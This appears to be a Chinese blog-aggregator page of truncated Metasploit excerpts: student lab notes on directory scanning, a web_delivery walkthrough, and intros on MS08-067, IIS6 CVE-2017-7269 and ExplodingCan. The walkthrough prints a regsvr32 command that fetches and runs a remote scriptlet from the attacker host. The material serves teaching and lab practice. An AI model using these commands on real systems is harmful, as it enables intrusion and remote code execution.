metasploit

Metasploit技巧命令支持tips

强颜欢笑 提交于 2020-05-02 10:04:47
Metasploit技巧命令支持tips 在Metasploit 5.0.80版本中,新增加了技巧命令tips,可以用来显示一些有用的技巧。大学霸IT达人如果想要查看所有的技巧列表,则执行命令为tip -l。在Metasploit 5.0.86版本中,支持使用tips命令。例如,查看技巧列表,则执行命令为tips -l。 来源: oschina 链接: https://my.oschina.net/u/1585857/blog/4261884

175210 《网络对抗技术》 Exp5 信息搜集与漏洞扫描

妖精的绣舞 提交于 2020-05-01 09:10:18
一、实践过程 1.各种搜索技巧的应用 1.1 搜索网址目录结构 使用 metasploit 的 brute_dirs,dir_listing,dir_scanner等辅助模块,主要是暴力猜解。原理是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功的。 dir_scanner 模块 use auxiliary/scanner/http/dir_scanner set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 // 设定扫描线程数 exploit dir_listing 模块 use auxiliary/scanner/http/dir_listing set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 exploit brute_dirs 模块 use auxiliary/scanner/http/brute_dirs set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 exploit 1.2 检测特定类型的文件 有些网站会链接通讯录,订单等敏感的文件,可以进行针对性的查找。 解释: site能限制检索结果的来源,格式为“检索词-词语”

175210 《网络对抗技术》 Exp5 信息搜集与漏洞扫描

我怕爱的太早我们不能终老 提交于 2020-05-01 08:49:02
一、实践过程 1.各种搜索技巧的应用 1.1 搜索网址目录结构 使用 metasploit 的 brute_dirs,dir_listing,dir_scanner等辅助模块,主要是暴力猜解。原理是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功的。 dir_scanner 模块 use auxiliary/scanner/http/dir_scanner set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 // 设定扫描线程数 exploit dir_listing 模块 use auxiliary/scanner/http/dir_listing set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 exploit brute_dirs 模块 use auxiliary/scanner/http/brute_dirs set RHOST 47.94.47.203 set RPORT 8080 set THREADS 50 exploit 1.2 检测特定类型的文件 有些网站会链接通讯录,订单等敏感的文件,可以进行针对性的查找。 解释: site能限制检索结果的来源,格式为“检索词-词语”

msf web_delivery模块攻击

浪尽此生 提交于 2020-04-30 11:48:55
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索web_delivery模块,search web_delivery 3.使用命令use exploit/windows/misc/regsvr32_applocker_bypass_server,并且查看这个模块选项 4.设置攻击机ip,set lhost 192.168.31.54 5.运行,run或者rexpolit 6.复制生成的regsvr32 /s /n /u /i:http://192.168.31.54:8080/Yos79zYgod.sct scrobj.dll,拿到目标机win7上去运行. 7.回到攻击机kai liunx就可以看到已经成功监听,并返回了一个session 8.输入sessions,查看session内容 9.输入命令sessions -i 1,这样就控制到了目标机了 10.截取当前桌面屏幕,并且去root目录下查看 11.输入shell,来到我们熟悉的界面,随便执行一个命令看看 来源: oschina 链接: https://my.oschina.net/u

Metasploit渗透测试魔鬼训练营pdf

℡╲_俬逩灬. 提交于 2020-04-28 06:39:09
下载地址: 网盘下载 内容简介 · · · · · · 首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性。以实践为导向,既详细讲解了Metasploit渗透测试的技术、流程、方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想。 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写。内容系统、广泛、有深度,不仅详细讲解了Metasploit渗透测试的技术、流程、方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思想。 书中虚拟了两家安全公司,所有内容都围绕这两家安全公司在多个角度的多次“对战”展开,颇具趣味性和可读性。很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践,实践,再实践”的宗旨。 本书采用了第二人称的独特视角,让读者跟随“你”一起参加魔鬼训练营,并经历一次极具挑战性的渗透测试任务考验。你的渗透测试之旅包括10段精彩的旅程。 全书共10章。第1章对渗透测试和Metasploit进行了系统介绍,首先介绍了渗透测试的分类、方法、流程、过程环节等,然后介绍了Metasploit的功能、结构和基本的使用方法。第2章详细演示了渗透测试实验环境的搭建。第3章讲解了情报收集技术

Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)

江枫思渺然 提交于 2020-04-28 06:19:04
ExplodingCan https://github.com/danigargu/explodingcan An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA. Details Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow CVE: CVE-2017-7269 Disclosure date: March 31 2017 Affected product: Microsoft Windows Server 2003 R2 SP2 x86 Why? Months ago I needed to study this exploit, and finally I implemented it in python. Shellcode The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed

2018-2019-2 网络对抗技术 20165230 Exp5 MSF基础应用

十年热恋 提交于 2020-04-28 06:18:36
[toc] <font size=3> # 1.实验内容 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块。(0.5分) 2.基础问题回答 (1)用自己的话解释什么是exploit,payload,encode. exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中。 payload也就相当于载荷,是我们exploit中shellcode中的主要功能代码,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。 encode也就是编码,是我们用来修改字符,实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。 3.实验内容 任务一:一个主动攻击实践 漏洞MS08_067(成功) 关于漏洞MS08_067的原理 安全公告:KB958644 时间:2008年底 原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行 详细原理说明:在规范化路径操作中,就是将路径字符串中'/'置换成''以及出去相对路径(例如:'.')

【复现】CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

故事扮演 提交于 2020-04-28 06:18:05
1.1.1 漏洞描述 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。 1.1.2 漏洞测试 环境搭建: 靶机:  win7(192.168.80.130) 攻击机: kali(192.168.80.129) (1)使用curl工具进行测试,测试命令: curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615" 测试结果截图: (2)使用POC测试,代码为: import socket import random ipAddr = " 192.168.80.130 " hexAllFfff = "

Metasploit 系列教程-(渗透测试框架)

左心房为你撑大大i 提交于 2020-04-28 06:15:43
一、 Metasploit 介绍    二、Metasploit 基础   1、Msfconsole   3、Exploits(漏洞)     使用漏洞   4、Payloads(有效载荷)     有效载荷类型     生成有效载荷   5、Databases(数据库)     使用数据库   6、Meterpreter     Meterpreter基础知识     Python扩展     Python扩展示例 三、Metasploit 信息收集   1、端口扫描   2、查找MSSQL   3、服务识别   4、密码嗅探     扩展Psnuffle   5、SNMP扫描   6、编写自己的扫描仪   7、枚举Windows修补程序 四、Metasploit 漏洞扫描   1、SMB登录检查   2、VNC认证   3、WMAP网络扫描仪   4、使用NeXpose     NeXpose通过MSFconsole   5、与Nessus合作     Nessus通过MSFconsole 五、Metasploit 写一个简单的漏洞检查工具   1、简单的TFTP漏洞检查工具   2、简单的IMAP漏洞检查工具 六、Metasploit Exploit开发(Exploit这里可理解为:漏洞,漏洞利用,渗透攻击)   1、Exploit 发展目标   2、Exploit 格式  

IIS6远程代码执行漏洞复现CVE-2017-7269

﹥>﹥吖頭↗ 提交于 2020-04-28 05:11:26
简述 CVE-2017-7269是IIS 6.0中存在的一个栈溢出漏洞,在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。 测试环境 受攻击系统:windows server 2003 攻击系统:Kali 2018.04 反弹主机:Ubuntu 18.04 LTS CVE-2017-7269漏洞原理 由恶意的 PROPFIND 请求所引起:当 If 字段包含了 http://localhost/xxxx 这段超长URL时,导致缓冲区溢出(包括栈溢出和堆溢出) 具体位置在w3wp.exe,httpext模块的ScStoragePathFromUrl函数处。 httpext!ScStoragePathFromUrl+0x360 处复制内存时产生了堆溢出 被溢出的堆块在 httpext!HrCheckIfHeader+0x0000013c 处分配; 崩溃所在位置也是从函数 httpext!HrCheckIfHeader 执行过来的; Metasploit5利用EXP Metasploit加载自定义模块 加载自定义模块方法 1、 在home目录里的【$HOME/.msf4/modules/exploits/】里就是自定义的模块 2、